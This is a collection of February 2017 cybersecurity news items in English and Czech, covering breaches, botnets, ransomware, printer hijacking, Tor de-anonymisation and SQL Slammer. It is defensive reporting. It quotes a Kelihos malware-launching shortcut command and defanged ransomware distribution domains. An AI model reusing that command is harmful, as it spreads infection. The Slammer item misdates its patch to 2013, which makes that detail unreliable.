"Anti-malware products," he explained, "are very focused on malicious software; that is, malware. When a new file gets put onto your system, anti-malware will scan it to determine whether it thinks it is malicious or not. It is very point-in-time. But the reality is that attackers are increasingly not using malware. They've got much more sophisticated -- but so has technology. We're leveraging new technology that has been very successful in other industries -- called event stream processing -- to look at the full history of what this system or process or set of processes has been doing."
Carbon Black's Streaming Prevention has grown out of the event stream processing developed for algorithmic trading. A simple algorithm could tell a trader to buy a particular stock at one price and to sell at another price. But if the entire market is moving, those point-in-time instructions could be bad advice. What is necessary for the algorithm is a deeper understanding of the entire market.
"It needs more data," said Viscuso. "So, a technology called event stream processing was developed which allowed the consumption of millions and millions of data points, and had the ability to analyze them very rapidly in order to make the right decision; and to further allow the algorithm to update itself, in milliseconds, over and over again in a loop, so that it can make better and better decisions over time."
This, he said, is the basis of Streaming Prevention. It applies machine learning and network anomaly techniques to the endpoint. It examines and tags TTPs (tactics, techniques and procedures) used in malicious activities, and analyzes them in context. "It is continuously learning from what it sees, and has seen in the past, when a certain sequence of events could lead to a breach. It can then apply a risk decision on that sequence of events to determine whether it is an attack or not. Over time, this risk decision gets more and more accurate and perceptive; and over time it will learn how to prevent all non-malware attacks."
Streaming Prevention is a cloud service. The analysis is conducted in the cloud and the result of the analyses pushed down to the endpoint so the endpoint acts independently. But data is gathered from all client endpoints and streamed up to the cloud. "The results are then shared with all customers so they are protected against local attacks and also new attacks happening elsewhere." Endpoints, he added, can now be protected against both malware and non-malware attacks.
In October 2016, Carbon Black announced a partnership with IBM Security that will allow Carbon Black endpoint threat data to feed into IBM's BigFix for instant attack remediation.
As a company, Carbon Black has more than 600 employees and is a result of Bit9 merging with Carbon Black in February 2014. In October 2016, The Wall Street Journal reported that Carbon Black has made a confidential IPO filing under the JOBS Act.
InterContinental Confirms Card Breach at 12 Hotels
7.2.2017 securityweek Crime
British multinational hotel company InterContinental Hotels Group (IHG) confirmed on Friday that systems processing payments for some of its properties in the Americas region have been breached by cybercriminals.
The company launched an investigation in late December, following reports of a fraud pattern on credit and debit cards used at some of its hotels, particularly ones operating under the Holiday Inn and Holiday Inn Express brands.
Cyber security firms investigating the incident found malware on servers that processed payment cards at the bars and restaurants of 12 properties managed by IHG. Cards used at front desks are not affected.
The malware infected servers between August and December 2016, and it was designed to steal track data (i.e. cardholder name, card number, expiration date and verification code) as it passed through the compromised system. The company has not provided any information about the number of affected cards.
The list of impacted hotels includes Crowne Plaza San Jose-Silicon Valley, Holiday Inn San Francisco Fisherman’s Wharf, InterContinental Los Angeles Century City, InterContinental Mark Hopkins in San Francisco, InterContinental San Francisco, InterContinental Buckhead Atlanta, InterContinental Chicago Magnificent Mile, InterContinental The Willard in Washington D.C., Holiday Inn Nashville Airport, Holiday Inn Resort in Aruba, InterContinental Toronto Yorkville in Canada, and InterContinental San Juan Resort & Casino in Puerto Rico.
“We have been working with the security firms to review our security measures, confirm that this issue has been remediated, and evaluate ways to enhance our security measures,” IHG told customers. “We have also notified law enforcement and are working with the payment card networks so that the banks that issue payment cards can be made aware and initiate heightened monitoring on the affected cards.”
IHG hotels were affected by at least two other data breaches last year. Kimpton Hotels & Restaurants informed customers in August that hackers had access to its payment systems between February and July, and InterContinental hotels were also involved in an incident that impacted HEI Hotels & Resorts.
The list of other hotel chains that suffered a data breach recently also includes Noodles & Company, Hard Rock Hotel & Casino Las Vegas, Trump Hotels, Millennium Hotels & Resorts and Omni Hotels.
Kelihos Spreads via USB Drives
7.2.2017 securityweek Virus
Kelihos, the malware behind one of the longest standing botnets out there, was recently observed spreading via infected thumb drives, researchers have discovered.
The Kelihos botnet has been around for many years, and even survived takedown attempts over half a decade ago. Last year, the botnet’s activity ramped up as tens of thousands of new bots were added to it. Kelihos was being used for the distribution of MarsJoke, Wildfire, and Troldesh ransomware and various Trojans, including Panda Zeus, Nymain and Kronos.
The botnet is being rented as part of the “spam as a service” business model and continues to be geo-targeting users. The latest campaign targeted users in Canada with links to web pages of Tangerine Bank phish websites, while distributing a link to the Ecstasy website to recipients with “.kz” email addresses, Arsh Arora, malware analyst and Ph.D. researcher at The University of Alabama at Birmingham, discovered.
The emails contain a webpage that attempts to trick the user into clicking a button with the subject line of “TANGERINE online account has been suspended” (where Tangerine is the Internet/telephone base bank formerly known as ING Direct). An HTML version of the page is displayed to the potential victims, encouraging them to click on a “Learn More” button, which would take them to a phishing site, in an attempt to steal their credentials by requesting them to verify their information.
The geo-tagging of addresses ending with “.kz” is something new for the Kelihos botnet, the security researcher notes. The spam message, which featured a subject line in Russian, was directing users to an adult site (www[dot]almatinki[dot]com).
The most interesting part of the attack, however, is the fact that the removable drives attached to the compromised machines would be infected with a copy of the original Kelihos binary. The security researcher says that the malware was written to a thumb drive connected to the virtual machine that was infected as part of the new campaign.
Saved on the thumb drive under the name of “porn.exe,” the executable is hidden from the user, the same as a few shortcuts that were not present on the removable device before. The file, the security researcher says, is the Kelihos botnet.
The researcher also discovered that the Create File function was linked to the dropped executable. The malware attempts to open several files with CreateFile and, if it fails, it then reverts to creating the .exe file, after which it writes the malicious binary to this file. Next, the malware creates shortcuts for the hidden directories and executables.
“An Autorun.inf is not created to run this file, however, a shortcut to the file with the command C:\WINDOWS\system32\cmd.exe F/c ‘start %cd%\porn.exe’ can be found on the drive, as well as shortcut to several other hidden directories on the drive (not malicious),” the security researcher says.
When the executable runs, it behaves just like a normal Kelihos would, though the researcher says that they weren’t yet able to infect a new drive with the botnet, meaning that further investigation is required to reveal the specific mechanism the malware uses for infection, especially with the executable seemingly identical to the original binary.
Android Ransomware Uses Dropper to Increase Effectiveness
7.2.2017 securityweek Virus
The use of droppers to infect devices with ransomware has spread to Android, Symantec security researchers warn.
The use of a dropper to deliver malware on Android is a new technique, although it is a very popular one when it comes to malware for desktop computers. Furthermore, researchers say, the actors using it have also implemented a 2D barcode technique meant to help them receive payment from victims, but they did this ineffectively.
Spotted about a year ago, the Lockdroid ransomware was designed to encrypt user files and perform other nefarious activities as well. It requests device admin rights and, if the user grants them, it can also lock devices, prevent the user from uninstalling it using the user interface (UI) or the command line interface, and can even force factory resets, thus erasing all user data from the device.
The malware designed to drop the Android.Lockdroid.E ransomware is being distributed via third-party apps, but also through text messages and forum posts. The malware first attempts to drop a version of itself only onto rooted devices, or locks those devices that haven’t been rooted, Symantec discovered.
Once installed on a device, the malicious app checks to see whether the device has been rooted and requests root access permissions if it has. The malware claims that this would allow it to access thousands of adult movies for free, in an effort to convince potential victims of the necessity of these permissions.
Once the user agrees, the malware drops a copy of itself onto the device, by remounting the /system partition, copying the embedded APK file for Android.Lockdroid.E to /system/app/[THREAT NAME].apk, changing the dropped APK file's permission to executable, and rebooting the device so the threat can run on boot completed as a system application.
After the reboot, the threat is difficult to uninstall from the infected devices, because it has become a system application. After the installation process has been completed, Android.Lockdroid.E locks the device and displays the ransom screen and 2D barcode.
On unrooted devices, the ransomware immediately locks the device and displays the ransom screen and barcode. In such cases, however, the malware does not drop anything onto the compromised device. According to Symantec, the ransom demanded by this Trojan is rather difficult to pay.
“The instructions ask the user to scan the barcode to log in to a messaging app to pay the ransom. While this may seem like a good idea to have victims pay the ransom for their device, it is ineffective in practice. There is no way to scan the barcode or log in to the messaging app from the compromised device, so the barcode must be scanned from a second device. This makes it more difficult for the victim to pay their ransom and for the attacker to receive payment,” the security researchers say.
A Hacker hijacked over 150,000 Printers publicly exposed online
7.2.2017 securityaffairs Hacking
A hacker hijacked over 150,000 Printers publicly exposed online to warn owners of cyber attacks.
Recently a group of researchers from the University Alliance Ruhr has found a cross-site printing bug in the old PostScript language. Popular printer models manufactured by Dell, Brother, Konica, Samsung, HP, and Lexmark are affected by security vulnerabilities that could be exploited by hackers to steal passwords, steal information from the print jobs, and shut down the devices.
Following the above research, a hacker with the online moniker Stackoverflowin decided to hack thousands of publicly exposed printers and to print rogue messages, including ASCII art depicting robots and warned that the printers had been hacked and they were part of a botnet.
The hacker said he wants to raise awareness about the risks of cyber attacks on printers exposed to the internet.
“A grey-hat hacker going by the name of Stackoverflowin says he’s pwned over 150,000 printers that have been left accessible online.” reads a blog post published by Bleeping Computer.
“Speaking to Bleeping Computer, the hacker says he wanted to raise everyone’s awareness towards the dangers of leaving printers exposed online without a firewall or other security settings enabled”
Stackoverflowin claims to be a British high-school student who is a passionate security researcher, he explained that he simply sent print jobs using the Line Printer Daemon (LPD), the Internet Printing Protocol (IPP) and the RAW protocol on communications port 9100 to printer models that were exposed on the internet without any authentication.
Stackoverflowin did much more, he also exploited an undisclosed remote command execution (RCE) vulnerability in the web management interface of Xerox devices.
The young hacker estimated that he compromised up to 150,000 printers, but he also added to have access to more RCE vulnerabilities which would have allowed him to access more than 300,000 printers.
Stackoverflowin wrote an automated script which scans the Internet for open printer ports and sends a rogue print job to the device.
Follow
Remigio Isla @lttle_wolf
@lmaostack LMAO! <3 can u send someone of Tweety? on my country we love tweety LOL 😂
4:40 PM - 4 Feb 2017
8 8 Retweets 10 10 likes
Below the latest version of the message sent to the printers:
stackoverflowin the hacker god has returned, your printer is part of a flaming botnet, operating on putin's forehead utilising BTI's (break the internet) complex infrastructure.
[ASCII ART HERE]
For the love of God, please close this port, skid.
-------
Questions?
Twitter: https://twitter.com/lmaostack
-------
Many users on Twitter shared images of the rogue messages sent on Friday to their printers.
The case demonstrates the importance to adopt necessary measures to protect devices exposed online, for example enforcing access rules in the routers, setting up a VPN or allowing the access from certain IPaddresses.
Danger přestává strašit, nebezpečný virus je na ústupu
6.2.2017 Novinky/Bezpečnost Viry
Škodlivý kód Danger byl hned několik měsíců v minulém roce nejrozšířenější hrozbou kolující na internetu. V současnosti je však na ústupu, jeho podíl v lednu výrazně klesl. Vyplývá to ze statistik antivirové společnosti Eset.
Hned na úvod se sluší podotknout, že i v lednu byl Danger nejrozšířenější hrozbou vůbec. Jeho podíl však dramaticky klesl meziměsíčně o více než 30 procentních bodů na 11,05 %. Právě to ukazuje, že je tento nezvaný návštěvník na ústupu.
Nebezpečný virus, plným názvem JS/Danger.ScriptAttachment, je velmi nebezpečný. Otevírá totiž zadní vrátka do operačního systému. Útočníci pak díky němu mohou propašovat do napadeného počítače další škodlivé kódy, nejčastěji tak šíří vyděračské viry z rodiny ransomware.
Zašifrují uložená data
Tyto škodlivé kódy začnou šifrovat obsah počítače a uživateli zobrazí oznámení, že za dešifrování počítače musí zaplatit, jinak se ke svým datům údajně již nikdy nedostane.
Ani po zaplacení výkupného navíc nemají uživatelé jistotu, že se ke svým datům skutečně dostanou. Virus je nutné z počítače odinstalovat a data následně pomocí speciálního programu odšifrovat. V některých případech to ale není možné.
„Pokles podílu downloaderu Danger je opravdu významný. V prosinci představoval téměř každou druhou zaznamenanou hrozbu, v lednu jen každou desátou. Zjistili jsme však významný nárůst výskytu různých typů malware rodiny TrojanDownloader,“ řekl Miroslav Dvořák, technický ředitel společnosti Eset.
Stahuje další škodlivé kódy
Tento malware přitom dokáže v počítači nadělat také velmi pěknou neplechu. „Stejně jako v případě Dangeru jde, ostatně jak už sám název napovídá, o kód snažící do napadeného zařízení nahrát další škodlivé kódy,“ podotkl Dvořák.
TrojanDownloader – konkrétně jeho verze Agent.CHO – byl druhou nejrozšířenější hrozbou s podílem 5,03 %. První pětku pak uzavírají škodlivé kódy ProxyChanger a Nemucod.
Přehled deseti nejrozšířenějších hrozeb za měsíc leden naleznete v tabulce níže:
Top 10 hrozeb v České republice za leden 2017
1. JS/Danger.ScriptAttachment (11,05 %)
2. VBA/TrojanDownloader.Agent.CHO (5,03 %)
3. JS/ProxyChanger (4,36 %)
4. JS/TrojanDownloader.Nemucod (4,12 %)
5. JS/Kryptik.RE (3,38 %)
6. VBA/TrojanDownloader.Agent.CIY (2,55 %)
7. VBA/TrojanDownloader.Agent.CIQ (2,04 %)
8. Java/Adwind (2,01 %)
9. JS/TrojanDownloader.Iframe (1,73 %)
10. PowerShell/TrojanDownloader.Agent.DV (1,58 %)
Zdroj: Eset
Locky, Sage Ransomware Share Distribution Infrastructure
6.2.2017 securityweek Virus
Locky ransomware was recently observed being distributed using the same delivery infrastructure previously used to spread the Sage ransomware, PhishMe security researchers warn.
It’s not uncommon for cybercriminals to share infrastructure, so the reuse of the same resources to drop both Sage and Locky isn’t surprising. However, the discovery does show that Locky’s operators are working on securing new distribution venues, after the Necurs botnet, the main Locky distributor, went silent recently.
The Sage ransomware emerged on the threat landscape at the end of 2016 and was detailed early this year. The first delivery emails employed explicit or racy narratives to trick users into opening malicious attachments, but the actors then moved to business-related themes and started using random numbers in email subjects to elude some basic spam filters.
Some of the distribution emails didn’t have a subject line at all, but featured recipient’s name as part of the attachment's file name, which was usually a double-zipped archive containing a malicious Office document or .js file. Other emails claimed to be containing information about a financial transaction that had been rejected, or that a deposit of a refund had been failed after an order had been canceled.
According to PhishMe, the campaign they analyzed leveraged a .zip file (named “document_1.zip”) with a JavaScript application inside, meant to download the Sage ransomware in the form of a Windows executable. The payload was retrieved from the domain affections[.]top, and the malware leveraged the same payment gateway’s Tor site as before, as well as the Tor2Web gateway addresses on er29sl[.]com and rzunt3u2[.]com.
Starting on January 26, 2017, however, a phishing campaign used to deliver the Locky ransomware was observed using the very same email narratives and metadata. Furthermore, the domain affections[.]top was being used as part of the delivery process for this ransomware family on Monday, January 30.
“This connection pushes the narrative forward in yet another way as the Locky distribution in question was yet another example of that ransomware being paired with the Kovter Trojan,” PhishMe notes. The relation between Locky and Kovter has been detailed a few times lately, most recently by Microsoft, which stumbled upon a two-step delivery technique which attempted to drop Locky first, but switched to Kovter if that failed.
The overlapping infrastructure also demonstrates once again how cybercriminals frequently reuse malware support and distribution infrastructure. The distribution of both Sage and Locky from the same location can be seen as evidence of the commodity status for ransomware tools like these. Both malware variants being distributed using these attributes and infrastructure enjoy equal effectiveness, but this also provides researchers and security professionals with a few avenues for mitigating them.
“First, the shared infrastructure provides a high-fidelity indicator of compromise that can be preemptively blocked to foil the delivery of multiple ransomware varieties. Secondly, since the qualitative tactics, techniques, and procedures used in the distribution of these ransomware varieties are nearly identical and closely resemble classic phishing narratives easily recognizable to users prepared and empowered to identify and report phishing emails,” PhishMe notes.
Many Darknet Sites Defaced in "Freedom Hosting II" Hack
6.2.2017 securityweek Hacking
Thousands of Tor-based websites became inaccessible last week after hackers breached the systems of Freedom Hosting II, a service provider that is believed to host roughly 20 percent of the sites on the dark web.
While Freedom Hosting II has hosted nearly 11,000 websites, an analysis conducted by privacy and anonymity researcher Sarah Jamie Lewis has shown that only 1,500 - 2,500 of them had any content.
Hackers affiliated with the Anonymous hacktivist movement said more than half of the websites hosted by Freedom Hosting II contained child pornography, despite the provider’s claims that it does not tolerate this type of content.
As a result, the hackers defaced all the sites hosted by Freedom Hosting and leaked data taken from its systems. The hackers also provided information on how they managed to breach the organization’s systems.
Users who attempted to access the websites were shown a message that started with, “Hello Freedom Hosting II, you have been hacked.” The Verge reported that the hackers initially offered to sell the stolen data for 0.1 bitcoin (roughly $100), but later apparently decided to make it available for free. The address provided by the attackers has received a total of 0.12 bitcoins.
13h
Sarah Jamie Lewis @SarahJamieLewis
I've spent some time on the data now & I plan on writing much more about it in the future. But I'm gonna lay out my current thoughts.
Follow
Sarah Jamie Lewis @SarahJamieLewis
First off, as I commented on Friday, this is a huge event. I think this will likely be seen as a milestone in the history of anonymity tech.
2:53 AM - 6 Feb 2017
Retweets 4 4 likes
13h
Sarah Jamie Lewis @SarahJamieLewis
As an analogy: it's like someone taking down geocities in the late 90s... Sure there was lots of crap, but also lots of diverse content.
Follow
Sarah Jamie Lewis @SarahJamieLewis
FHII made it easy for people to start playing with anonymous publishing - and in doing so created a huge vulnerability.
3:03 AM - 6 Feb 2017
Retweets 2 2 likes
Australian security expert Troy Hunt, the owner of the Have I Been Pwned breach notification service, analyzed the leaked data and discovered a 2.2 Gb database containing more than 380,000 user records, including email addresses, usernames and passwords.
Hunt believes law enforcement agencies will find the leaked data very useful, especially since it includes real email addresses. He also pointed out that many of the addresses are on .gov domains, but it’s unclear how many of them are real and what they have been used for.
The leaked data was also analyzed by Chris Monteiro, who confirmed that Freedom Hosting II hosted some large English and Russian-language forums related to child abuse. The researcher also identified fraud, account hacking, fetish and botnet websites.
The original Freedom Hosting was taken down by the FBI back in 2013. Before shutting it down, the agency exploited a vulnerability to identify darknet users.
ENISA Report Provides ICS-SCADA Protection Recommendations
6.2.2017 securityweek Safety
ENISA Publishes "Communication Network Dependencies for ICS-SCADA Systems" Report for Critical Infrastructure Protection
The clear emergence of cyber weapons used for political interference -- cyber espionage such as the OPM breach probably related to China; political manipulation such as the breach and leaks relating to the DNC by Russia; and physical damage such as the Ukraine power outages by Russia or its supporters -- has focused attention on the security of the critical national infrastructures. Much of that infrastructure is controlled and operated by ICS/SCADA systems.
The European Union Agency for Network and Information Security (ENISA) has published a new analysis and recommendations on 'Communication network dependencies for ICS/SCADA Systems' (PDF). The report concentrates on two of the primary causes of security concern: network segmentation and communication between the segments; and the wider issue of communications with the outside world that often uses the Internet.
The report was compiled from an analysis of stakeholder conversations with members of the ENISA ICS and SCADA groups together with data from official sources and other ICS/SCADA experts in the field. It highlights three primary causes for concern, and makes eight specific security recommendations for its target audience of asset owners and operators of electricity, oil, gas, transport, health, water supply, and the manufacturing industry.
The three worrying attack scenarios are remote compromise allowing an attacker to take control of one or multiple assets within the network; the insider threat from a disgruntled employee, contractor or third-party staff with in-depth knowledge of the infrastructure; and the risk of infection during the maintenance or upgrade process. Associated with the third concern is the website where the update files and firmware are located.
Related: Learn More at SecurityWeek's ICS Cyber Security Conference
The report examines ICS/SCADA communication networks and their interdependencies, and examines the threats, vulnerabilities, incidents and attacks affecting those networks while focusing on those that might result in cascading effects. It also presents a gap analysis to highlight areas that require further work.
A section on security good practices outlines the necessary steps in first understanding and then protecting the network. This includes a list of technology and processes that can "greatly increase the protection of the availability, integrity, confidentiality and non-repudiation" of the network and its communications.
Finally, it presents a list of eight "high-level recommendations for manufacturers, operators and security experts that will help them to improve the security level and resilience of the ICS/SCADA systems and communication network functions." These are:
1. Include security as a main consideration during the design phase of ICS SCADA systems.
2. Identify and establish roles of people operating in ICS/SCADA systems.
3. Define network communication technologies and architecture with interoperability in mind.
4. Establish brainstorming and communication channels for the different participants on the lifecycle of the devices to exchange needs and solutions.
5. Include the periodic ICS/SCADA device update process as part of the main operations of the systems.
6. Establish periodic ICS/SCADA security training and awareness campaign within the organization.
7. Promote increased collaboration amongst policy decision makers, manufacturers and operators at EU Level.
8. Define guidelines for the establishment of reliable and appropriate cybersecurity insurance requirements.
These recommendations, modified where necessary, would make part of good practice for any industry. The ENISA report goes further to focus their particular relevance to operational technology. For example, for the first 'security by design' recommendation, it explains that, "Traditionally, only safety is included as one of the main considerations during the design of an ICS/SCADA system or infrastructure (alongside efficiency, real-time constraints, etc.). However, the concept of security is not, although it is now one of the main risk sources that should be covered to prevent future attacks and incidents."
While users have little control over ICS/SCADA development and manufacturing processes, ENISA recommends that "during the design phase, the security of the devices, and the communications between them, has to be one of the main concepts that will impact on the choice of devices, measures to implement, and overall design of the architecture."
As a result of this process, writes ENISA, "the systems' security is increased as many threats have been mitigated. This can be measured via risk assessment, vulnerability assessment or penetration test."
This basic structure is repeated for each of the recommendations: a description of the issue, action required, and effect of implementation. The result is a thorough examination of the ICS/SCADA security landscape together with practical steps to improve the security posture of the critical national infrastructure.
Microsoft Windows DRM issue could be exploited to uncloak Tor Browser users
6.2.2017 securityaffairs Exploit
HackerHouse researchers have discovered that media content protected by Digital Rights Management (DRM) can be used to uncloak Windows Tor Browser users.
The anonymity of the Tor users is threatened by a new issue related the Microsoft’s DRM. Windows users running the Tor browser can be de-anonymized with a trick based on the Microsoft DRM (Digital Rights Management) mechanism.
The discovery was made by researchers at Hacker House while they were conducting a study on social engineering attacks made by using a content protected with DRM.
Tor users can be unmasked by clicking on a media file revealing the user’s real IP address.
“DRM is a licensing technology that attempts to prevent unauthorised distribution and restrictive use of a media file. It works by encrypting the video and audio streams with an encryption key and requesting a license (decryption key) from a network server when the file is accessed. As it requires network connectivity it can cause users to make network requests without consent when opening a media file such as a video file or audio file. WMV is using Microsoft Advanced Systems Format (ASF) to store audio and video as objects. This file format consists of objects that are labelled by GUID and packed together to make a media package.” reads the analysis published on myhackerhouse.com.
Simplifying the problem, DRM-protected content has to fetch a license key from a server in order to be displayed. Windows raises a dialogue to the user is the content If isn’t signed properly.
Windows DRM Tor
“However, this warning DOES NOT appear if the DRM license has been signed correctly and the Digital Signature Object, Content Encryption Object and Extended Content Encryption Object contain the appropriate cryptographic signing performed by an authorised Microsoft License Server profile”
Windows DRM Tor
Researchers at Hacker House highlighted that Microsoft requests an expensive fee to users that want to sign media.
“DRM is expensive business and unless you use the SDK to develop your own application you will likely need to make use of a license provider to encrypt your WMV files using these tools and also for signing purposes. If you want to build your own Microsoft DRM signing solution the price-tag is around $10,000.” states Hacker House.
The experts have discovered online serviced managing to generate signed content avoiding a so expensive payment. These Windows DRM providers that could be used to sign user media can decloak Tor users.
“There are several free DRM providers who could sign your media for you however as the barrier to entry to the DRM market is the aforementioned price tag, it makes you wonder how these files are being signed in the wild!” continues the analysis.
“As these “signed WMV” files do not present any alert to a user before opening them they can be used quite effectively to decloak users of the popular privacy tool TorBrowser with very little warning”, they write.
Experts at the Tor Project are aware of the possibility that hackers track Windows Tor users leveraging on Windows DRM issue. They invite users to run Tails if they need to run media files.
Terčem kyberútoku se loni stala celosvětově pětina firem
6.2.2017 Novinky/Bezpečnost Kyber
Podíl firem, které se ve světě staly terčem kybernetického útoku, se loni zvýšil o šest procentních bodů na 21 procent. Celková odhadovaná škoda za rok 2016 je 279 miliard amerických dolarů (skoro sedm biliónů korun). Nejvíce na vzestupu bylo vydírání. Vyplývá to ze studie Grant Thornton, která zahrnuje informace 10 000 společností z 37 zemí.
V Severní Americe útoky přiznalo 24 procent firem, v EU dokonce 32 procent firem. Průměr stahuje dolů asijsko-pacifický region se 13 procenty napadených firem. Citelný nárůst kyberkriminality se však týká všech regionů.
Nejčastějším primárním důsledkem kyberútoků je zhoršená reputace, kterou uvedlo 29 procent společností, následuje ztráta času a energie, kterou je nutné vynaložit na nápravu vniklých škod. Ztrátu zákazníků označilo jako primární škodu 16 procent společností a sedm procent firem pocítilo přímý pokles obratu.
Vydírání je v kurzu
Nejčastěji se vyskytující formou kyberútoku je poškození obchodní infrastruktury. Tuto variantu přiznalo 22 procent napadených firem. Zkušenost s vydíráním pod pohrůžkou zveřejnění informací, násilí nebo poškození aktiv firmy přiznalo 17 procent společností.
"Vydírání je v paletě finančních zločinů tradičně vnímáno jako velmi nekalá praktika. V online světě je navíc vydírání velmi dobře organizované. Samotným útokem to však nekončí. Organizaci v návaznosti na tento útok vznikají další finanční ztráty vlivem poškozené reputace, zcizení informací, duševního vlastnictví, eventuálně fyzických škod na infrastruktuře," uvedl partner Grant Thornton David Pirner.
Podle expertů z Grant Thornton reagují společnosti na kyberútoky příliš pozdě. Celkem 13 procent firem zjistilo, že se staly oběťmi kyberútoku déle než po týdnu. Čtyři společnosti ze sta dokonce až déle než po měsíci.
Přišlo hacknutí ministerstva zahraničí jako na zavolanou?
6.2.2017 Novinky/Bezpečnost BigBrother
Předkladatelé zákona o Vojenském zpravodajství jsou „na koni“. Je teď přeci evidentní, že ČR potřebuje kybernetickou obranu a že stát se o ni postará nejlépe.
Jak jistě víte, v současnosti je ve sněmovně novela zákona o Vojenském zpravodajství, jež má svěřit obranu (ano, to je rozhodně něco jiného než ochrana) českého kybernetického prostoru Vojenskému zpravodajství (VOZ). Pokud mi dovolíte velké zjednodušení, tak zákon v podstatě říká, že VOZ bude instalovat do sítí operátorů prostředky kybernetické obrany, což jsou technické prostředky vedoucí k předcházení, zastavení nebo odvrácení kybernetického útoku ohrožujícího zajišťování obrany České republiky. Operátoři mají povinnost o připojení prostředků kybernetické obrany pomlčet.
Není divu, že takto vágně formulovaný zákon vzbudil vlnu nevole. Asi nejviditelnějším protestem je prohlášení tří významných asociací – CZ.NIC, ICT Unie a NIX.CZ. Samozřejmě, argumentů proti této novele lze nalézt mnohem více. V tom ovšem přišla zpráva jako hrom, a to, že někdo hacknul mailový server Ministerstva zahraničních věcí ČR, a rázem jsou předkladatelé zákona „na koni“. Je teď přeci evidentní, že Česká republika potřebuje kybernetickou obranu a že stát se o to postará nejlépe. Na toto téma jsem si přečetl i zajímavý rozhovor na Aktualne.cz. Ale je tento bezpečnostní incident skutečně argumentem pro přijetí této novely? Já myslím, že je tomu právě naopak!
Dále čtěte: Útoků na ministerstvo zahraničí si dlouho nikdo nevšiml. Kdo bude dalším cílem?
Ve zmiňovaném rozhovoru ministr (všeobecné) obrany uvádí, že pokud by byl přijat zákon, vojenští zpravodajci by zasahovali. Zní to, jako jasný argument pro urychlené přijetí zákona. Ale já si neustále kladu otázku: „Kdo jim v tom bránil?“. A teď mi prosím promiňte, že budu v následujících řádcích vnímat státní správu jako jeden celek. Nicméně, stát přeci v žádném případě neměl zakázáno starat se o svou vlastní kybernetickou bezpečnost (či obranu, chcete-li). Pokud chce stát dávat zařízení kybernetické obrany do sítí soukromých operátorů, proč je už neinstaloval do svých, státních sítí, aby ukázal, jak prospěšná zařízení to jsou? Proč se stát či konkrétně VOZ nechlubí množstvím odražených útoků v sítích státních úřadů, aby ukázal, že tímto jednoznačně prospěje i soukromé sféře? Není to spíše naopak? Žádný významný soukromý poskytovatel e-mailů neměl v poslední době takto závažný incident. Proč si tedy někdo myslí, že nás stát ochrání a že by měl instalovat prostředky kybernetické obrany v sítích soukromých operátorů? Proč nezačne u sebe? Například může začít na MZV a dalších ministerstvech.
Dále čtěte: Dušan Navrátil (NBÚ): Velké kyberútoky na český stát už probíhají, stojí za nimi jiné země
Mimochodem je velmi zajímavé sledovat, jak se mění argumentace předkladatelů k zákonu v reakci na ono prohlášení asociací. Například i ve zmíněném rozhovoru se hovoří o tom, že zmíněná zařízení kybernetické obrany budou pouze pasivní a jejich vyřazením z provozu tedy nemůže dojít k závažnějším provozním problémům. Ale to je v přímém kontrastu s definicí obsaženou v navrhované novele. Tato definice mluví jasně o technických prostředcích vedoucí k předcházení, zastavení nebo odvrácení kybernetického útoku. Pokud mají být zařízení pouze pro odposlech, proč se v návrhu zákona mluví o zastavení a odvrácení?
Rozhodně podporuji snahu státu o zvýšení kybernetické bezpečnosti svých systémů. Ale nemyslím si, že správným prostředkem je odposlech všech i se stáními systémy nesouvisejících sítí. Pevně věřím, že vše zlé je pro něco dobré. Doufám, že tento podivný návrh zákona nastartuje seriozní debatu o tom, jak zvýšit kybernetickou bezpečnost země a stát upustí od podivných Orwellovských nápadů a začne se vážně zabývat tím, jak zvýšit zabezpečení svých IT systémů.
Darknet Marketplace Hansa Launches Bug Bounty Program
6.2.2017 securityweek Security
The darknet marketplace Hansa announced last week the launch of a bug bounty program with rewards of up to 10 bitcoins, currently worth more than $10,000.
Hansa allows users to buy and sell various types of items, including drugs, fraud-related services, jewelry, counterfeit products, electronics, and IT services. The marketplace is designed to minimize the risk of scams operated by vendors and Hansa administrators, and claims to guarantee that users will not lose their funds in case of a hack or law enforcement operation.
In an effort to minimize the chances of the website getting hacked, Hansa’s owners have decided to launch a bug bounty program. The highest rewards, up to 10 bitcoins, will be paid out for vulnerabilities that could “severely disrupt Hansa’s integrity,” such as flaws that expose IP addresses or user information.
Hansa has promised 1 bitcoin, worth roughly $1,000, for bugs and vulnerabilities that are not critical. Users can also earn 0.05 bitcoins ($50) for reporting simple display bugs or unintended behavior.
“To be eligible, you must demonstrate a security compromise on our market using a reproducible exploit. Should you encounter a bug please open a ticket and inform us about your findings,” Hansa administrators wrote in a Reddit post announcing the bug bounty program.
Users who submit vulnerability or bug reports must not make their findings public before the issue has been fixed, and they must refrain from conducting any tests that could have a negative impact on the website or its users. Hansa has advised users to provide detailed proof-of-concepts (PoCs) to increase their chances of receiving a reward.
Hansa has promised to respond to vulnerability and bug reports as quickly as it can, and provide updates while it works to address the problem.
In the Reddit post announcing the launch of the bug bounty program, two users said they had already submitted reports describing vulnerabilities that could have serious consequences if exploited.
Last month, someone reported finding a vulnerability that exposed the private messages exchanged by users of the popular darknet marketplace AlphaBay. The individual who discovered the security hole claimed to have created a bot that collected more than 200,000 private messages.
The same individual also said he had identified a flaw in the Hansa marketplace, which allegedly allowed him to obtain 240,000 Hansa usernames.
The Slammer worm is back after 13 years to target ancient SQL servers
6.2.2017 securityaffairs Virus
The SQL Slammer worm, one of the most long-lived malware, now seems to be back online to compromise ancient SQL servers worldwide.
SQL Slammer is probably one of the most long-lived threats, it first appeared 14 years ago and now it is back to compromise ancient SQL servers.
SQL Slammer exploits an ancient flaw in Microsoft SQL server and Desktop Engine causing a denial of service, it was 2003 when the security researcher Michael Bacarella raised the alarm to SlammerSlammer and the worm caused a denial of service condition on tens of thousands of systems around the world.
The researcher noticed a “massive packet loss to various points on the globe” caused by a worm affecting MS SQL Server which was pingflooding addresses at some random sequence.
The worm is able to exploits a buffer overflow vulnerability in Microsoft SQL Server 2000 or MSDE 2000 by sending a formatted request to UDP port 1434.
After the worm infects a server, it attempts to spread rapidly by sending the same payload to random IP addresses, causing a denial of service condition on the victim’s machine.
SQL Slammer was created starting from a proof-of-concept exploit code published during Black Hat by now the Google security researcher David Litchfield.
The Slammer Worm was using a SQL Server Resolution service buffer overflow flaw, discovered by NGSSoftware, and patched by MS in July 2013.
Now researchers at Check Point researchers confirmed that the threat has risen in early December (between 28 November, 2016, and 4 December, 2016), it mostly targeted machines in the US.
“During a routine analysis of global data collected by Check Point ThreatCloud, we detected a massive increase in the number of attack attempts between November 28 and December 4, 2016, making the SQL Slammer worm one of the top malware detected in this timeframe:” reads the analysis published by Check Point.
